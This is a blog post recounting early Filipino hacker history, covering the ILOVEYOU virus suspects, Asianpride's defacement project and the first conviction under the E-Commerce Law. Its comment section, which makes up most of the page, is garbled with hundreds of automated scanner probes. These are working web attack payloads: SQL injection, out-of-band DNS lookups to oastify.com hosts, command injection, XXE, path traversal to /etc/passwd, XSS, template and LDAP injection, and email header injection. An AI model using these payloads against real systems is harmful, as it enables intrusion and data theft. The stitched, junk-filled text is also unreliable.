Threat Intelligence has always been misunderstood from some Filipinos working in the scene but not all. Some threat intelligence analysts would tend to point that the Anonymous Philippines originated from some hacker cons and that most white hats are still active in the underground scene and are not entirely reformed hackers. I read this from a leaked presentation from before but I don’t want to point what Threat Intel company is involved for the mischief.
They talk about Threat Intel but they don’t share the stories of our Pinoy hackers and some of the origins of our Pinoy hackers. And so I hope that this post will somehow serve justice to them.
I was already online when Friendster was vulnerable to HTML Injection and XSS. BUT none of us care.
IRC was my home back then despite having Friendster and Yahoo messenger.
DALnet back then was home for the underground Filipino hacker groups. Before Philker, Privatex, Anonymous Philippines and ProjectX era (2008 – pre-ComeLeak), there were Filipino hacker groups like Asianpride, PHTeam, Philcarder, Oneball, Darkscience, and Locusts.org (year 2000 – 2004?).
Before talking about these groups. Let’s travel further to what happened in May 4 2000.
The I Love You Virus True Story (May 2000)
“On May 4 2000, an e-mail bearing the title ”I LOVE YOU” began popping up in computers in Asia. When opened, it destroyed graphics and other files. The e-mail program, commonly called a virus or worm, which replicates by sending itself to all the other e-mail addresses in a computer’s database. Within hours, the worm plagued through government offices in Europe and the United States which forced The Pentagon, CIA, the British Parliament, and most large corporations to completely shut down their mail systems.” –Wikipedia
The Suspects (Filipino students from AMA)
Onel de Guzman
Onel de Guzman admitted unleashing the “Love Bug”, the computer virus that caused havoc by infecting 45 million machines around the world.
He has never worked for the CIA, Microsoft and Pentagon.
Michael Buen
Michael Buen denies writing the virus but:
“In February 2000 (Before the outbreak of the virus), a virus was sent to clients of Sophos, a security firm based in Oxfordshire, England. It came in the form of a CV in the name of Michael Buen and it came from the Philippines. The virus was designed to reproduce itself and infect Word documents.” – Soldierx HDB
Impact of I Love You Virus
- Since there were no laws in the Philippines against writing malware at the time, Onel was released with all charges dropped by state prosecutors.
- To address this legislative deficiency, the Philippine Congress enacted Republic Act No. 8792, otherwise known as the E-Commerce Law, in July 2000, just two months after the worm outbreak.
- In 2012, the Smithsonian Institution named ILOVEYOU the tenth-most virulent computer virus in history.
After 20 years of silence…
Onel de Guzman in 2020
Geoff White then interviewed Onel last April 2020 regarding the virus:
“De Guzman claimed he sent the virus initially to someone in Singapore, and then went out drinking with a friend. The first he knew of the global chaos he had unleashed was when his mother told him police were hunting a hacker in Manila.
His mother hid his computer equipment, but not the diskettes containing de Guzman’s classmates’ names, including Michael Buen, which were later found by the police. De Guzman insisted Buen had nothing to do with the Love Bug and that he was its sole creator.” – Computer Weekly
Where is Michael now?
I was able to tracked him in Twitter and his blog way back 2010.
So who is really the real virus author? You be the judge.
The 4’ O Clock Project (Year 2000 – 2002)
Since I talked about the old underground groups let us dig further about them.
As early as 2000 (based on the archives), a project initiated by Asianpride was launched which is the 4 o’clock Project. Their aim was to publicize the flaws of Philippine websites during that time. The website contained their mass defacements and defacement mirrors or archives from popular Philippine websites like cebu.gov.ph, Globe ISP, informatics.edu.ph, ABS-CBN websites, server.purefoods.com.ph, Icct.edu.ph, etc.
Website: http://fouroclockproject.iwarp.com/
Sample Defacement Page in the archive dedicated to Rico Yan
Asianpride allegedly was able to intrude into the servers of local ISP Mosaic Communications Inc (MosCom or Mozcom), uploading executable programs that would eventually modify a website’s main page.
1st Cybercrime Conviction (2005)
Before Rodel Plasabas, Paul Biteng and Joenel de Asis; JJ Maria Ginner was the first Filipino hacker accused of hacking and defacing of the government portal gov.ph. Here are some facts:
- He was convicted under the E-Commerce Law for hacking the government’s .gov.ph site. (Criminal Case No. 419672-CR filed at Branch 14 of the Metropolitan Trial Court of Manila under Judge Rosalyn Mislos-Loja)
- He was sentenced to one to two years of imprisonment and fined Php100,000. However, he immediately applied for probation, which was eventually granted by the court.
- The conviction is now considered a landmark case, as he is the first local hacker to be convicted under section 33a of the E-Commerce Law or Republic Act 8792.
Where is JJ Maria Ginner?
I can’t confirm nor deny where he is right now but I am proud to say that he is a very excellent penetration tester right now and that you may have seen him in some hacker conferences.
Part 2?
There are more stories before ComeLeak. Follow our Facebook Page for more updates and new stories: https://www.facebook.com/nullforgesec.
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %ehpqc;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ehpqc;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\kym9i2jro652bp10wglw9zcjza51wrksfg66uyho5d.oasti’+’fy.com\hwa’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\1fhqzj085nmjs6ihdx2dqgt0grmid819wxnobgy6mv.oasti’+’fy.com\orp’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\cn317u8jdyuu0hqsl8aoyr1bo2utlj9k48v0js6iu7.oasti’+’fy.com\iis’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\98fysrtgyvfrlebp65vljom89zfq6guhp5gy4qrgf5.oasti’+’fy.com\aux’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\kth9d2erj6026pw0rggw4z7jua01rrfsag1ipac00p.oastify.com\\why’))
COMMENT *’+(select load_file(‘\\\\f7n4rxsmx1exkkav5buriule85ew5mtnobfe36qwel.oastify.com\\ezp’))+’
COMMENT *’
(select*from(select(sleep(20)))a)
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *+(select*from(select(sleep(20)))a)+
COMMENT * and (select*from(select(sleep(20)))a)–
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT * waitfor delay’0:0:20′–
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *)waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *,0)waitfor delay’0:0:20′–
COMMENT *’,0)waitfor delay’0:0:20′–
COMMENT *||pg_sleep(20)–
COMMENT *’||pg_sleep(20)–
COMMENT * AND pg_sleep(20)–
COMMENT *’ AND pg_sleep(20)–
COMMENT *,”||pg_sleep(20)–
COMMENT *’,”||pg_sleep(20)–
COMMENT *)AND pg_sleep(20)–
COMMENT *’)AND pg_sleep(20)–
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %qbenb;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %qbenb;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\mc2noryjuihxk54wjnn5gnu8wz2sqspgg64yrofd.oasti’+’fy.com\cpu’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\8w598di5e41j4roi397r09euglmeae920tolbbz0.oasti’+’fy.com\ces’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\vonw00as6rt6weg5vwzesw6h88e1211pshg93zro.oasti’+’fy.com\lqv’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\7s084ce4a3xi0qkhz83qw8atckid6d51wukm7cv1.oasti’+’fy.com\bdi’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\wrrx31dt9sw7zfj6yx2fvx9ib9h2524qvsjk6auz.oastify.com\\hcd’))
COMMENT *’+(select load_file(‘\\\\j0kkcomgif5u82st7kb24ki5kwqpepdd4gs8fy3n.oastify.com\\zto’))+’
COMMENT *’
(select*from(select(sleep(20)))a)
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *+(select*from(select(sleep(20)))a)+
COMMENT *’+(select*from(select(sleep(20)))a)+’
COMMENT * and (select*from(select(sleep(20)))a)–
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT * waitfor delay’0:0:20′–
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *)waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *,0)waitfor delay’0:0:20′–
COMMENT *’,0)waitfor delay’0:0:20′–
COMMENT *||pg_sleep(20)–
COMMENT *’||pg_sleep(20)–
COMMENT * AND pg_sleep(20)–
COMMENT *’ AND pg_sleep(20)–
COMMENT *,”||pg_sleep(20)–
COMMENT *’,”||pg_sleep(20)–
COMMENT *)AND pg_sleep(20)–
COMMENT *’)AND pg_sleep(20)–
COMMENT *,0)AND pg_sleep(20)–
COMMENT *’,0)AND pg_sleep(20)–
COMMENT *41370714′ or ‘1931’=’1931
COMMENT *61083131′ or ‘4853’=’4858
COMMENT *55020466′ or ‘5719’=’5719
COMMENT *52374364′ or ‘5778’=’5778′
COMMENT *77505157′ or 6336=6336–
COMMENT *79972310′ or 5218=5226–
COMMENT *89955019′ or 4867=4867–
COMMENT *88424698′ or 2780=2780′–
COMMENT *’ and ‘9137’=’9137
COMMENT *’ and ‘6148’=’6154
COMMENT *’ and ‘2734’=’2734
COMMENT *’ and ‘7940’=’7940′
COMMENT *’ and 9196=9196–
COMMENT *’ and 7728=7730–
COMMENT *’ and 7550=7550–
COMMENT *’ and 7916=7916′–
COMMENT *”
fl7x837s28
COMMENT *w0clhaguz0
COMMENT *alert(1)
COMMENT *cg5c9omxhh
COMMENT *rtuzlalert(1)cpfie
COMMENT *rtuzlalert(1)cpfie
COMMENT *rtuzl%3cscript%3ealert%281%29%3c%2fscript%3ecpfie
COMMENT *rtuzlalert(1)cpfie
COMMENT *jellvalert(1)eft2m
COMMENT *jellvalert(1)eft2m
COMMENT *jellv%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eeft2m
COMMENT *jellvalert(1)eft2m
COMMENT *itw70oxowg
COMMENT *itw70oxowg
COMMENT *itw70%3ca%20b%3dc%3eoxowg
COMMENT *itw70oxowg
rrar0${946*231}ztmdn
xwnq6{{229*978}}x23wx
e7xwp#{770*385}wpmhk
qq4lx[[851*113]]vsagx
d0jk8${file.separator}upmds
fk8tn%{231*273}s4978
v91hs{{682|add:962}}m0vq0
#set ($a=964*868) hvupz${a}z9rzg
ppf0yvctwm
gpioz
= 766*529
bv5vu{{.}}dj2i9{{..}}v4i7v
uvbwx__${588*365}__wnns5
COMMENT *}}ycz17’/”<mwy12
COMMENT *%}z73vx’/”<k9cql
COMMENT *jjoe5%>t3rn7’/”<ukyvi
COMMENT *’+sleep(20.to_i)+’
COMMENT *’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’
eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))
COMMENT *’.sleep(20).’
COMMENT *{${sleep(20)}}
ji8p92juv8ddoodotkgc
7zv1ot8zzj%41aa31pa00ah
qychgj3w4f\\lw78k2k3dz
wvb16cjvfrAx0h5js58om
wvb16cjvfrAx0h5js58om
COMMENT *s8ra894emo9jhody3nj4
COMMENT *0flyacryzx%41hu8nyr3771
COMMENT *wzo7nkwrnb\\lljlch5xrx
COMMENT *vxaq6kiohzAueyc6stlhp
COMMENT *vxaq6kiohzAueyc6stlhp
2mp3y78z4yrdulect3xlq34o6fc808zwrkj79vy.oastify.com
http://mj9nvr5j1ioxr5bwqnu5nn183z9sxswgm4er4ft.oastify.com?COMMENT *
nslookup -q=cname svrt7xhpdo033bn22t6bztdef5ly9y8m1pphc70w.oastify.com.&
COMMENT *|nslookup -q=cname 7nv8zc9453sivqfhu8yqr85t7kdd1d01wpoce03.oastify.com.&
COMMENT *'”`0&nslookup -q=cname 7nv8zc9453sivqfhu8yqr85t7kdd1d01xppcf04.oastify.com.&`’
COMMENT *&nslookup -q=cname 5bh6nax2t1ggjo3fi6mof6trvi1bpbozjnba1yq.oastify.com.&’\”`0&nslookup -q=cname 5bh6nax2t1ggjo3fi6mof6trvi1bpbozjnba1yq.oastify.com.&`’
COMMENT *|echo rwea1mt16o d81csgdsbl||a #’ |echo rwea1mt16o d81csgdsbl||a #|” |echo rwea1mt16o d81csgdsbl||a #
COMMENT *&echo ftc0qvbvc9 ofl3738fxo&
COMMENT *”|echo lti87hhje0 h8ppopj58d ||
COMMENT *’|echo ftzrzccape 4pj1hqngb6 #xzwx
COMMENT *|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1
COMMENT *|ping -c 21 127.0.0.1||x
COMMENT *&ping -n 21 127.0.0.1&
COMMENT *’|ping -c 21 127.0.0.1 #
COMMENT *”|ping -n 21 127.0.0.1 ||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
c:\windows\win.ini
../../../../../../../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini
../../../../../../../../../../../../../../../../winnt/win.ini
\windows\win.ini
file:///c:/windows/win.ini
…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini
…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini
…\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini
windowswin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
COMMENT *..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
COMMENT *../../../../../../../../../../../../../../../../windows/win.ini
COMMENT *..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini
COMMENT *../../../../../../../../../../../../../../../../winnt/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniCOMMENT *
c:\windows\win.iniCOMMENT *
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniCOMMENT *
../../../../../../../../../../../../../../../../etc/passwd
/etc/passwd
file:///etc/passwd
…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd
etcpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
COMMENT *../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwdCOMMENT *
…/COMMENT *
./COMMENT *
././COMMENT *
COMMENT *ono
./././COMMENT *
./wp-comments-post.php
…/wp-comments-post.php
ren/wp-comments-post.php
././wp-comments-post.php
/./wp-comments-post.php
/…/wp-comments-post.php
/kwx/wp-comments-post.php
/././wp-comments-post.php
1tv592x9ii)(objectClass=*
woien4076w)(!(objectClass=*)
lidj14hh3d)(!(!(objectClass=*))
1naa40gxpl)(!(!(!(objectClass=*)))
*)(objectClass=*
*)(!(objectClass=*)
*)(!(!(objectClass=*))
*)(!(!(!(objectClass=*)))
hsh
COMMENT *]]>><
COMMENT *’+(function(){if(typeof vwvkp===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);vwvkp=1;}}())+'
“–>’–>`–>
COMMENT *
BCC:[email protected]
olf: s
COMMENT *>
BCC:[email protected]
sjp: n
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %iells;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %iells;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\ugevsz2ryql5od84nvrdkvyg0760u0toke86vwjl.oasti’+’fy.com\rwk’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\t2wueyoqkp74acu39udc6ukfm6szgzfn6eu6hw5l.oasti’+’fy.com\qxc’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\ki6lup4h0gnvq3auplt3ml062x8qwqvem6ayxold.oasti’+’fy.com\joq’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\8en9qd05w4jjmr6il9pri9wuyl4eser2iv6ntdh2.oasti’+’fy.com\kvm’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\1km2w66y2xpcskcbr2vko22n4ea7y7xvoxcpzfn4.oastify.com\\wgv’))
COMMENT *’+(select load_file(‘\\\\m2pnerojki7xa5uw9nd56nk8mzssgsfg6jubh15q.oastify.com\\mxa’))+’
COMMENT *75267315′ or ‘9857’=’9857
COMMENT *60240648′ or ‘4860’=’4869
COMMENT *62057298′ or ‘2169’=’2169
COMMENT *95855555′ or ‘1267’=’1267′
COMMENT *81482573′ or 8556=8556–
COMMENT *90968380′ or 5661=5663–
COMMENT *89507163′ or 3550=3550–
COMMENT *66856932′ or 3718=3718′–
COMMENT *’ and ‘4848’=’4848
COMMENT *’ and ‘6194’=’6195
COMMENT *’ and ‘8959’=’8959
COMMENT *’ and ‘2827’=’2827′
COMMENT *’ and 1393=1393–
COMMENT *’ and 8199=8208–
COMMENT *’ and 2461=2461–
COMMENT *’ and 7688=7688′–
mf54qtfaer
COMMENT *zhgr7s0y7k
COMMENT *alert%281%29
COMMENT *siq2zdjurk
COMMENT *zpyzzalert(1)lwwy3
COMMENT *zpyzzalert(1)lwwy3
COMMENT *zpyzz%3cscript%3ealert%281%29%3c%2fscript%3elwwy3
COMMENT *zpyzzalert(1)lwwy3
COMMENT *zc697alert(1)gtabi
COMMENT *zc697alert(1)gtabi
COMMENT *zc697%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3egtabi
COMMENT *zc697alert(1)gtabi
COMMENT *nx4pxbjrab
COMMENT *nx4pxbjrab
COMMENT *nx4px%3ca%20b%3dc%3ebjrab
COMMENT *nx4pxbjrab
mzoxh${705*147}b8ang
m3ta6{{834*258}}qu1mc
n2q74#{309*708}btcvt
ghxfx[[577*587]]rvxht
md49u${file.separator}gztuy
cob3e%{435*823}sb4s3
w94cw{{488|add:352}}vyuc8
#set ($a=159*826) odjig${a}unexw
b0y99obbzh
zqogr
= 568*183
ah2r8{{.}}hp8mr{{..}}qko8f
xh3qy__${813*384}__xs5yi
COMMENT *}}luzzn’/”<x9q8k
COMMENT *%}wi5py’/”<vx7bz
COMMENT *pb19a%>b0f23’/”<pl9lx
3b5usi4cz5ftrf42ox8v
rp4bw29rzj%41smh62no31d
er4ltyydb0\\ljqjwlx0j8
kjo000uoc9Aukpxgk7m3w
kjo000uoc9Aukpxgk7m3w
COMMENT *zs3upqpth7qxc66y4d7d
COMMENT *43iwqlfxds%41szsfpm83qd
COMMENT *c7jbqobxpe\\lm9ksehkv5
COMMENT *upebnov0maAcb46603kde
COMMENT *upebnov0maAcb46603kde
aq4b2fc786vlytikxb1tub8wangg4g34vsnfd32.oastify.com
http://caqdmhw9s8fniv2mhdlvedsyup0ioin6du5hv5k.oastify.com?COMMENT *
nslookup -q=cname sietux4p0on3qba2pttbmt0e258ywyvmopchz7nw.oastify.com.&
COMMENT *|nslookup -q=cname l8umkquiqhdwg40vfmj4cmq7syyrmrlfh39qzeo.oastify.com.&
COMMENT *'”`0&nslookup -q=cname dbsenixat9gojw3niemwfetzvq1jpjo7lvdi36s.oastify.com.&`’
COMMENT *&nslookup -q=cname 3uy468g0czze2mmd145my4cpegk9897x2lu8kw9.oastify.com.&’\”`0&nslookup -q=cname 3uy468g0czze2mmd145my4cpegk9897x2lu8kw9.oastify.com.&`’
COMMENT *|echo h4pa5t1ko7 udn598h77l||a #’ |echo h4pa5t1ko7 udn598h77l||a #|” |echo h4pa5t1ko7 udn598h77l||a #
COMMENT *&echo 7emnw4ydra ljs8m6fiea&
COMMENT *”|echo 0p0f2vzq71 h5xm3rb3n6 ||
COMMENT *’|echo 38di5xfizm hwm4hno659 #xzwx
COMMENT *&ping -n 21 127.0.0.1&
xsdvzl407t)(objectClass=*
nm77e1ihkx)(!(objectClass=*)
9j4k9nfixx)(!(!(objectClass=*))
gcc1211u8z)(!(!(!(objectClass=*)))
nnn
COMMENT *]]>><
COMMENT *’+(function(){if(typeof j0n85===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);j0n85=1;}}())+'
“–>’–>`–>
COMMENT *
BCC:[email protected]
fpc: s
COMMENT *>
BCC:[email protected]
hwp: m
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
xtuy52fubty81gl70y4gxybjdaj3736ryjmb91xq
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %nemvl;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %nemvl;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\z000c4mwiv5a8is970bi40ilkcq5e5dt4jsbf13q.oasti’+’fy.com\qan’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\iqcj2ncf8evty1isxj11uj84avgo4o3cu3iv5lta.oasti’+’fy.com\ebd’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\6487gbq3m29hcpwgb7fp87msojucich08swkja7z.oasti’+’fy.com\lva’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\9v5a7eh6d50k3snj2a6szadvfmlf9f83zwnoaey3.oasti’+’fy.com\neh’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\tvsu7yhqdp043cn32u6czudff6lz9z8nzpnha7yw.oastify.com\\gqn’))
COMMENT *’+(select load_file(‘\\\\hxii9mjefd2s50pr4i801if3hunnbnab1ep6cw0l.oastify.com\\mdh’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %loxzw;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %loxzw;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\dube6igac9zo2wmn1e5wyeczeqkj8j77yxmp9fx4.oasti’+’fy.com\dah’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\4ej5q901w0jfmn6el5pni5wqyh4asaryip6ht7hw.oasti’+’fy.com\jci’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\vedwq00swrj6me65lwpeiwwhy841s1rpih69tzho.oasti’+’fy.com\xnv’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\86c9ids5o4bjeryid9hra9ouqlwekej2avynld92.oasti’+’fy.com\doe’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\a4fbgfq7m69lctwkbbft8bmwonugigh486wyjo7d.oastify.com\\izt’))
COMMENT *’+(select load_file(‘\\\\ezhfbjlbha4p7xro6fax3fh0jrpkdkc83br3et2i.oastify.com\\grd’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %mnvsf;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %mnvsf;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\s70tjxtppoc3fbz2etibbtper5xylykmbcz4muaj.oasti’+’fy.com\erj’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\efxfrj1bxakpnx7omfqxjfx0zr5ktks8jz7ruhi6.oasti’+’fy.com\lvp’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\4pu519b170ufxnhew50nt57q9hfa3a2ytqhi48sx.oasti’+’fy.com\cvq’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\d7lejitap9cofwzneeiwbepzrqxjljk7b0zsmia7.oasti’+’fy.com\wcp’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\p3tqfupmll80b8vzaqe87qlbn2tvhvgj7lvdi36s.oastify.com\\vhx’))
COMMENT *’+(select load_file(‘\\\\sietux4p0on3qba2pttbmt0e258ywyvmmpahx7lw.oastify.com\\znp’))+’
(select extractvalue(xmltype(‘<!DOCTYPE root [ %ovhca;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ovhca;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\bt8c5gf8b7ym1ull0c4uxcbxdojh7h65xvln8dw2.oasti’+’fy.com\jvy’; exec master.dbo.xp_dirtree @q;–
